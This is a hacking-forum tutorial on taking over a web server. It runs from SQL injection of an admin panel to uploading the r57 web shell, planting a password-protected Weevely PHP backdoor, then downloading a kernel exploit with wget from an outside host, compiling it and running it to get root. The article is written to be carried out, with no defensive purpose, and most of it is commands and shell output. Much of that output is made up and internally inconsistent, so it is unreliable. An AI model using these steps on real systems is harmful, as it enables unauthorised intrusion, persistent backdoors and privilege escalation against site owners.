BackDoor & Rooting With Backtrack - Server Rooting - Web Hacking - Hacking - GeniusHackers.Net
Main » Articles » Web Hacking » Server Rooting

BackDoor & Rooting With Backtrack
Today I'm going to post a tutorial Related to Backdoor Via Backtrack 5.
Now for this you need A Virtual Machine Install with Backtrack 5.

Lets Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via SQL injection. The site was sql vulnerable (Assumption)

Admin Panel: http://target.com/admin/index.php

After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php

now..
Run you Vmware >> Backtrack 5...
The game starts now.. 
Backdooring a server with encrypted php backdoor.. amazing !


root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles

+ Backdoor file ‘bdoor.php ’ created with password ‘rustles".Now go and check your desktop. There will be a encrypted php file bdoor.php .

=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location

Now we have to connect to our encrypted bdoor.php


root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p rustles

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.

[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!

[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp

Directory pcp Successfully Created.

[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a

Linux 2.6.32 kernel (Assume)

[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-

[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp]  Rooted 

Enjoy!

Special ThanX to GeniusHaCkers
Category: Server Rooting | Added by: MaX-HaCker (12.08.28)
Views: 1624 | Comments: 1 | Rating: 5.0/1
Total comments: 1
0   Spam
1 //3Kw1N0x   (13.03.09 9:27 AM)
j00 K0p13d 73h 73X7 phr0M 3X 5173 l053rrR

//3Kw1N0x

Only registered users can add comments.
[ Registration | Login ]
Like us on FacebookFollow us on Twitter
Recommend on Google
Our Media
Our Media

Our Blog
Our Blog

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2016
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz